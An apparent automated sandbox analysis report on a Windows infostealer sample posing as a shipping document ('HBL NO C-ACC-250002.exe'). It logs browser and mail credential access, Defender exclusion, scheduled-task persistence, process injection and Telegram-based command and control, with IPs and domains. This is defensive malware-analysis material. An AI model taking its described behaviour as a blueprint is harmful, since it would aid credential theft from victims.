                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeQueries volume information: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeQueries volume information: C:\Users\user\AppData\Roaming\uyDicX.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeQueries volume information: C:\Users\user\AppData\Roaming\uyDicX.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.4499608217.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4499894132.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4499894132.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4499894132.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4499608217.0000000002F0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4499608217.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4499894132.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: uyDicX.exe PID: 5144, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: uyDicX.exe PID: 6024, type: MEMORYSTR
                Source: Yara matchFile source: 0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4499894132.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: uyDicX.exe PID: 6024, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara matchFile source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: uyDicX.exe PID: 5144, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: uyDicX.exe PID: 6024, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.4499608217.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4499894132.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4499894132.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4499894132.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4499608217.0000000002F0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4499608217.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4499894132.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: uyDicX.exe PID: 5144, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: uyDicX.exe PID: 6024, type: MEMORYSTR
                Source: Yara matchFile source: 0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4499894132.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: uyDicX.exe PID: 6024, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scheduled Task/Job
                111
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory13
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Scheduled Task/Job
                3
                Obfuscated Files or Information
                Security Account Manager1
                Query Registry
                SMB/Windows Admin Shares1
                Email Collection
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing
                NTDS11
                Security Software Discovery
                Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets1
                Process Discovery
                SSHKeylogging14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading
                Cached Domain Credentials31
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                Process Injection
                Proc Filesystem1
                System Network Configuration Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1631593 Sample: HBL NO  C-ACC-250002.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 52 reallyfreegeoip.org 2->52 54 api.telegram.org 2->54 56 2 other IPs or domains 2->56 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 68 12 other signatures 2->68 8 HBL NO  C-ACC-250002.exe 7 2->8         started        12 uyDicX.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 52->64 66 Uses the Telegram API (likely for C&C communication) 54->66 process4 file5 38 C:\Users\user\AppData\Roaming\uyDicX.exe, PE32 8->38 dropped 40 C:\Users\user\...\uyDicX.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp61D1.tmp, XML 8->42 dropped 44 C:\Users\...\HBL NO  C-ACC-250002.exe.log, ASCII 8->44 dropped 70 Adds a directory exclusion to Windows Defender 8->70 14 powershell.exe 23 8->14         started        17 HBL NO  C-ACC-250002.exe 15 2 8->17         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        72 Antivirus detection for dropped file 12->72 74 Multi AV Scanner detection for dropped file 12->74 76 Injects a PE file into a foreign processes 12->76 24 uyDicX.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 78 Loading BitLocker PowerShell Module 14->78 28 conhost.exe 14->28         started        30 WmiPrvSE.exe 14->30         started        46 api.telegram.org 149.154.167.220, 443, 49785, 49786 TELEGRAMRU United Kingdom 17->46 48 checkip.dyndns.com 193.122.6.168, 49706, 49709, 49715 ORACLE-BMC-31898US United States 17->48 50 reallyfreegeoip.org 104.21.64.1, 443, 49711, 49712 CLOUDFLARENETUS United States 17->50 32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        80 Tries to steal Mail credentials (via file / registry access) 24->80 82 Tries to harvest and steal browser information (history, passwords, etc) 24->82 36 conhost.exe 26->36         started        signatures9 process10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.